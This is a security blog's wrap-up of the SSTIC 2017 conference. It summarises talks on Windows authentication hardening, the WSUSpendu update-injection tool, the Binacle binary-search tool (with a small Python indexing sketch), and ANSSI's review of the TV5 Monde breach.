Usually, the YELLOW level is the most important one, but in order to protect it, it is also necessary to protect the RED level. The idea is to improve the security of these levels by securing the Windows authentication process. To do so, you should take the following steps:

  • Disable NTLM and use Kerberos instead
  • Forbid Kerberos delegation for the administrators
  • Protect the AS requests on Kerberos
  • Restrict the computers where the administrators are allowed to connect from

The first two items can easily be applied by an administrator using GPOs. For the other items, built-in Windows features can be used.

These features are not new, but they are not particularly well known. However, to benefit from them you need to be running at least Windows 8 and Windows Server 2012.

WSUSpendu

This talk was presented by Romain Coltel (Alsid) and Yves Le Provost (ANSSI). The goal was to present a new tool called WSUSpendu (pendu means “hanged” in French). This work was inspired by the WSUSPect tool presented at Black Hat in 2015, which allowed “Man-In-The-Middle” attacks to be performed on insecure WSUS connections in order to inject fake updates onto the target. By default, WSUS uses HTTP connections to send updates, which are composed of signed binaries and XML files containing the description of the updates. The idea behind WSUSpendu is to inject fake updates directly on the WSUS server. The use case is very simple: if an attacker is able to compromise the WSUS server, it is possible to insert malicious updates into the WSUS database in order to target a specific workstation or server.

This tool could be very useful during internal penetration tests and should be in your toolset.

Binacle

Another presentation by one of the ANSSI team (Guillaume Jeanne), and another interesting tool for hunting malicious binaries. Guillaume presented Binacle, a tool which allows you to perform full-text searches on binaries. Of course, the idea is not just to perform string searches but also to be able to search for an arbitrary series of bytes, for instance. In the first part, the speaker showed us the difficulties of searching a binary compared to a text file. Guillaume tried several approaches before settling on one that allows searches in constant time, with a reasonable database size and quick insertion into the database. Next, he compared the execution time of his tool to a Yara scan, with much better results. The idea is to use Binacle to help generate Yara rules, but also to speed up the scans themselves.

Finally, the tool is written in Rust and could be really useful for incident response work.
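The general idea behind this kind of fast binary search – indexing every fixed-size byte n-gram of each file so that a query only has to examine files containing all of the query’s n-grams – can be sketched as follows. This is a toy Python illustration of the indexing concept, not Binacle’s actual data structure or its performance guarantees:

```python
# Toy illustration of n-gram indexing for byte-sequence search:
# index every 3-byte gram of each binary, then answer queries by
# intersecting the posting sets and verifying candidates exactly.
from collections import defaultdict

def trigrams(data: bytes) -> set:
    """All overlapping 3-byte sequences in the data."""
    return {data[i:i + 3] for i in range(len(data) - 2)}

class NgramIndex:
    def __init__(self):
        self.index = defaultdict(set)   # trigram -> set of file names
        self.files = {}                 # file name -> raw bytes

    def add(self, name: str, data: bytes) -> None:
        self.files[name] = data
        for gram in trigrams(data):
            self.index[gram].add(name)

    def search(self, needle: bytes) -> list:
        """Intersect posting sets for candidates, then check each exactly."""
        candidates = set.intersection(
            *(self.index.get(g, set()) for g in trigrams(needle))
        )
        return sorted(f for f in candidates if needle in self.files[f])

idx = NgramIndex()
idx.add("a.bin", b"\x90\x90\xcc\xc3payload")
idx.add("b.bin", b"\x31\xc0\x40\xc3other")
print(idx.search(b"payload"))  # ['a.bin']
```

The index answers queries by touching only the posting sets for the query’s grams, so search cost depends on the query rather than on the total size of the corpus – the same property that makes a pre-built index faster than a linear Yara scan over every file.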

TV5 Monde post-incident review

For the closing conference, the ANSSI team (again!) delivered feedback about the TV5 Monde hack. As a reminder, TV5 Monde is a French channel that was hacked in 2015 by the APT28 group. The hack affected the broadcast of programmes for several days, as well as the channel’s various online accounts (Twitter, Facebook and YouTube). The first part of the presentation focused on how the attackers succeeded in compromising the internal network and, without any surprise, it was unfortunately pretty easy. The attackers were able to steal the credentials of a contractor (VPN access) and use them to obtain internal access to the TV5 network. The lack of network segregation allowed the attackers to compromise several machines, and they quickly found a domain admin account. The next step was to create a specific domain administrator account to be used by the attackers in order to reconnect easily. Finally, the attackers found an internal wiki containing clear-text passwords and documentation about the broadcast equipment used by TV5 Monde. The second part of the presentation focused on remediation, and especially on how the ANSSI team rebuilt the Active Directory. A complete transcription of the presentation was made by Mathieu Suiche and can be found on his blog.

This presentation was really good and it was really interesting to get feedback about a real security incident. Bravo to ANSSI and TV5 Monde for choosing to share this kind of information with the community.

Other interesting talks

  • YaCO (Yet another Collaborative tool): this tool aims to add a “multi-user” layer to IDA in order to allow multiple people to work on the same binary
  • Deploying TLS 1.3: presentation by Filippo Valsorda (Cloudflare), focusing on the new features available in TLS 1.3. If it sounds interesting, read the blog article here and see the video in English
  • Breaking Samsung Galaxy Secure Boot through Download mode: Frédéric Basse presented a bootloader bug in Samsung Galaxy smartphones which, with physical access, allowed for the execution of arbitrary code. Full article in English
  • BinCAT: purrfecting binary static analysis: BinCAT is a tool able to perform static analysis on x86 binaries with the following features: value analysis (registers and memory), taint analysis, type reconstruction and propagation, backward and forward analysis. Full article in English
  • Subscribers remote geolocation and tracking using 4G VoLTE enabled Android phone: P1Sec presented an issue in the VoLTE (Voice over LTE) protocol allowing the position (location) of a contact to be leaked. Full article in English

References

A more detailed write-up in English can be found at the following links:

The post SSTIC 2017 wrap-up appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/feed/ 0